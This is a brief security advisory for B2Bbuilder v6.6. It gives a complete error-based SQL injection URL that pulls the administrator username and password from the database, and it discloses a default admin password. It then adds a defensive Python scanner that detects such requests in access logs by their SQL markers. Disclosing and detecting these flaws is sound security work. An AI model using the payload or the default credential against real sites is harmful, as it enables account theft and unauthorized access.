B2Bbuilder injection vulnerability + Exp + default administrator account

2013-07-22T00:00:00
ID MYHACK58:62201339792
Type myhack58
Reporter Adoing
Modified 2013-07-22T00:00:00

Description

The version of the program tested is B2Bbuilder_v6.6.

http://www.site.com/?m=offer&s=offer_list&id=1004+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x27%2C0x7e%2Cb2bbuilder_admin.user,0x27,password%2C0x27%2C0x7e%29+from+%60b2bbuilder%60.b2bbuilder_admin+Order+by+user+limit+0%2C1%29+%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1

This B2B program has a default administrator account; the account password is test.
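For defenders reviewing web server logs, the request above has a recognizable shape: a non-numeric `id` value carrying a subselect with `floor(rand(...))`, `group by` and `information_schema`. The following detection sketch is an added example, not part of the original advisory or of B2Bbuilder; the log format (combined access log), the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Markers of the error-based technique seen in the request above:
# floor(rand(0)*2) grouped over information_schema rows inside a subselect.
MARKERS = {
    "floor_rand": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "group_by": re.compile(r"group\s+by", re.I),
    "information_schema": re.compile(r"information_schema", re.I),
    "subselect": re.compile(r"\(\s*select\b", re.I),
}
# Client address and request target from a combined-format access log line (assumed format).
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def inspect_target(target, param="id"):
    """Classify one request target by the decoded content of its `id` parameter."""
    values = parse_qs(urlsplit(target).query, keep_blank_values=True).get(param, [])
    bad = [v for v in values if not re.fullmatch(r"[0-9]+", v)]
    if not bad:
        return "ok", []
    hits = sorted(n for n, rx in MARKERS.items() if any(rx.search(v) for v in bad))
    if "floor_rand" in hits and "group_by" in hits:
        return "error_based_sqli", hits
    return "non_numeric_id", hits

def scan(lines):
    """Return (client, verdict, markers) for every request that is not clean."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        verdict, hits = inspect_target(m.group(2))
        if verdict != "ok":
            findings.append((m.group(1), verdict, hits))
    return findings

# Constructed log lines: documentation IP ranges, shortened marker-only payload.
SAMPLE_LOG = [
    '198.51.100.10 - - [22/Jul/2013:09:58:01 +0000] "GET /?m=offer&s=offer_list&id=1004 HTTP/1.1" 200 8123',
    '203.0.113.7 - - [22/Jul/2013:09:59:40 +0000] "GET /?m=offer&s=offer_list&id=1004+and%28select+1+from'
    '%28select+count%28*%29%2Cconcat%280x7e%2Cfloor%28rand%280%29*2%29%29x+from+information_schema.tables'
    '+group+by+x%29a%29 HTTP/1.1" 200 312',
    '198.51.100.22 - - [22/Jul/2013:10:01:12 +0000] "GET /?m=offer&s=offer_list&id=1004%27 HTTP/1.1" 200 120',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same all-digits check on `id`, applied in the application before the value reaches the query, rejects this class of request outright.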